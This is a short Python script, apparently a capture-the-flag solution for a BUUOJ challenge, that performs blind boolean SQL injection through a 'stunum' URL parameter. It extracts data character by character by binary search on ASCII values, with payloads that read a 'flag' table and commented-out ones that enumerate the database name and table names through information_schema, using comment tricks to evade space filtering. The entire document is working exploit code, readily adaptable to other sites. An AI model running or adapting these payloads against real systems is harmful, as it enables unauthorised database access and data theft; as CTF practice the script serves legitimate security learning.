import requests
url = "http://93b7e81c-3dd4-4eaf-9ddf-8342b4e4bc7a.node3.buuoj.cn/?stunum="
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
# payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select(value)from(flag)),%d,1))>%d,1,0)" % (
i, mid)
r = requests.get(url + payload)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
